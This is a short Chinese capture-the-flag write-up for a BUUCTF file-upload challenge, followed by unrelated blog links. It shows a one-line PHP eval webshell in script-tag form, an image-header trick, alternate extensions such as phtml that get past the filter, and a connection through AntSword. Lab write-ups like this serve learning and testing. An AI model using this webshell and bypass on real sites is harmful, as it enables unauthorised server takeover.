buuctf web [极客大挑战 2019]Upload

上传头像,上传一下,看看能不能成功

抓包,抓取上传时的数据,看看限制条件

改两个地方,符合上传图片的要求,上传试试

一句话木马的<?被扳了

改一下木马的格式

<script language="php">eval($_POST'cmd');</script>

别骗我,这不是图片

加一个图片头

但是此时文件格式为.jpg我们利用不了

所以,换成没有被过滤的网页格式

ps(补充):文件绕过的格式php,php3,php4,php5,phtml.pht

phtml没有被过滤,可以使用

上传成功,下面就要看看,上传的文件被放在了什么位置

根据题目提示,大胆猜测文件位置在/upload/1.phtml

先访问一下/upload

果然在这里

下面,打开蚁剑连接

连接成功

相关推荐
天平3 小时前
油猴脚本创建webworker踩坑记录
前端·javascript·typescript
原则猫5 小时前
前端基础大厦
前端
陈随易6 小时前
编程语言级别的Skill市场,AI Agent 的未来形态
前端·后端·程序员
SoaringHeart7 小时前
Flutter进阶:基于 EasyRefresh 的下拉刷新封装 n_easy_refresh_mixin.dart
前端·flutter
IT_陈寒9 小时前
Vite的热更新突然不香了,排查三小时差点砸键盘
前端·人工智能·后端
子兮曰9 小时前
Agency-Agents 深度解析:400+ AI 专家的"梦之队"如何重塑开发工作流
前端·后端·vibecoding
竹林81810 小时前
用 The Graph 查询链上数据实战:从手搓 RPC 到 Subgraph,我的 NFT 项目数据加载快了 10 倍
前端·javascript
妙码生花10 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十九):点选验证码代码逐行目检
前端·后端·go
Awu122711 小时前
⚡从零开发 Agent CLI(五)实现一个可治理、可扩展的工具系统
前端·人工智能·claude
咪库咪库咪11 小时前
Vue3-生命周期
前端